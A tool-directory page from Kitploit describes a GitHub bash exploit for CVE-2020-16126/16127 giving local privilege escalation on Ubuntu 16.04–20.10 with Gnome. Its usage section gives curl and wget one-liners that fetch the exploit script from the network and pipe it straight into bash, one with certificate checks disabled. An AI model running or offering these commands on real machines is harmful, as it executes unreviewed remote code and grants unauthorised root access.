Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Ubuntu-Gnome-privilege-escalation — A bash script exploit of [CVE-2020-16126/CVE-2020-16127] to achieve privilege escalation.Ubuntu 16.04-20.04 LTS本地提权漏洞利用脚本。要求拥有Gnome图形化环境。 | Kitploit
Tools/GitHubGitHub/zev3n/ubuntu-gnome-privilege-escalation
Privilege EscalationVulnerability AnalysisExploitationPenetration Testing
GitHubzev3n/ubuntu-gnome-privilege-escalation

Ubuntu-Gnome-privilege-escalation

A bash script exploit of [CVE-2020-16126/CVE-2020-16127] to achieve privilege escalation.Ubuntu 16.04-20.04 LTS本地提权漏洞利用脚本。要求拥有Gnome图形化环境。

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
3135 years agoNot yet reviewed

Ubuntu-Gnome-privilege-escalation

A bash script exploit of [CVE-2020-16126/CVE-2020-16127] to achieve privilege escalation.

一个可以方便实现Ubuntu本地提权的bash脚本(利用CVE-2020-16126/CVE-2020-16127漏洞),要求处于Gnome环境。

Affect version

Ubuntu 20.04.1\20.10\18.04\16.04 LTS and so on

Usage

curl https://raw.githubusercontent.com/zev3n/Ubuntu-Gnome-privilege-escalation/main/CVE-2020-1612%5B6_7%5D_exploit.sh | bash

or (If you have No permissions to install 'curl',you could try...)

wget -q -O - --no-check-certificate https://raw.githubusercontent.com/zev3n/Ubuntu-Gnome-privilege-escalation/main/CVE-2020-1612%5B6_7%5D_exploit.sh | bash

Demonstration

TODO

Reference

https://securitylab.github.com/advisories/GHSL-2020-187-accountsservice-drop-privs-DOS

Download Tool